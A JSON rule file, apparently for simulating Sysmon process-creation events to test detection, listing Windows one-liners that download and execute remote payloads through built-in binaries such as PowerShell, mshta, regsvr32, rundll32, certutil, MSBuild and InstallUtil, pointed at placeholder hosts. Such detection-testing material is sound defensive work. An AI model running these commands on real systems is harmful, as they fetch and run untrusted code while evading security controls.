-
Notifications
You must be signed in to change notification settings - Fork 58
/
windows-oneliners.json
188 lines (188 loc) · 7.3 KB
/
windows-oneliners.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
{
"name": "Windows oneliners",
"version": "0.1",
"author": "n0dec",
"description": "Windows oneliners to download remote payload and execute arbitrary code. https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/",
"rules": {
"powershell_inline": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Powershell one command line download using proxy credentials.",
"payload": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "powershell -exec bypass -c \"(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex\""
}
},
"powershell_webdav": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Powershell download payload directly from a WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "powershell -exec bypass -f \\\\webdavserver\\folder\\payload.ps1"
}
},
"cmd": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Cmd executing batch file from a WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\cmd.exe",
"CommandLine": "cmd.exe /k < \\\\webdavserver\\folder\\batchfile.txt"
}
},
"cscript": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Cscript one command line for download payload directly from a WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\cscript.exe",
"CommandLine": "cscript //E:jscript \\\\webdavserver\\folder\\payload.txt"
}
},
"mshta_inline": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Mshta execute inline script downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\mshta.exe",
"CommandLine": "mshta vbscript:Close(Execute(\"GetObject(\"\"script:http://webserver/payload.sct\"\")\"))"
}
},
"mshta_remote": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Mshta execute hta file downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\mshta.exe",
"CommandLine": "mshta http://webserver/payload.hta"
}
},
"mshta_webdav": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Mshta execute hta file downloaded from WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\mshta.exe",
"CommandLine": "mshta \\\\webdavserver\\folder\\payload.hta"
}
},
"rundll32_webdav": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Rundll32 execute dll file downloaded from WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\rundll32.exe",
"CommandLine": "rundll32 \\\\webdavserver\\folder\\payload.dll,entrypoint"
}
},
"rundll32_inline": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Rundll32 execute inline jscript downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\rundll32.exe",
"CommandLine": "rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\";o=GetObject(\"script:http://webserver/payload.sct\");window.close();"
}
},
"wmic": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "WMIC inline script via XSL file downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\wbem\\WMIC.exe",
"CommandLine": "wmic os get /format:\"https://webserver/payload.xsl\""
}
},
"regasm": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Regasm execute dll file downloaded from remote WebDAV server.",
"payload": {
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe",
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe /u \\\\webdavserver\\folder\\payload.dll"
}
},
"regsvr32_inline": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Regsvr32 execute inline script downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\regsvr32.exe",
"CommandLine": "regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll"
}
},
"regsvr32_webdav": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Regsvr32 execute inline script downloaded from remote WebDAV server.",
"payload": {
"Image": "C:\\Windows\\System32\\regsvr32.exe",
"CommandLine": "regsvr32 /u /n /s /i:\\\\webdavserver\\folder\\payload.sct scrobj.dll"
}
},
"odbcconf": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Odbcconf execute dll file downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\regsvr32.exe",
"CommandLine": "odbcconf /s /a {regsvr \\\\webdavserver\\folder\\payload_dll.txt}"
}
},
"msbuild": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "MSBuild execute inline code downloaded from remote server.",
"payload": {
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe",
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe /noautoresponse /preprocess \\\\webdavserver\\folder\\payload.xml"
}
},
"certutil_download": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Certutil download file from remote server.",
"payload": {
"Image": "C:\\Windows\\System32\\certutil.exe",
"CommandLine": "certutil -urlcache -split -f http://webserver/payload payload"
}
},
"certutil_decode": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "Certutil decode file and drop it as payload.",
"payload": {
"Image": "C:\\Windows\\System32\\certutil.exe",
"CommandLine": "certutil -decode payload.b64 payload.dll"
}
},
"installutil": {
"enabled": true,
"source": "Sysmon",
"category": "Process Create",
"description": "InstallUtil execute dll file as a payload.",
"payload": {
"Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe",
"CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil /logfile= /LogToConsole=false /u payload.dll"
}
}
}
}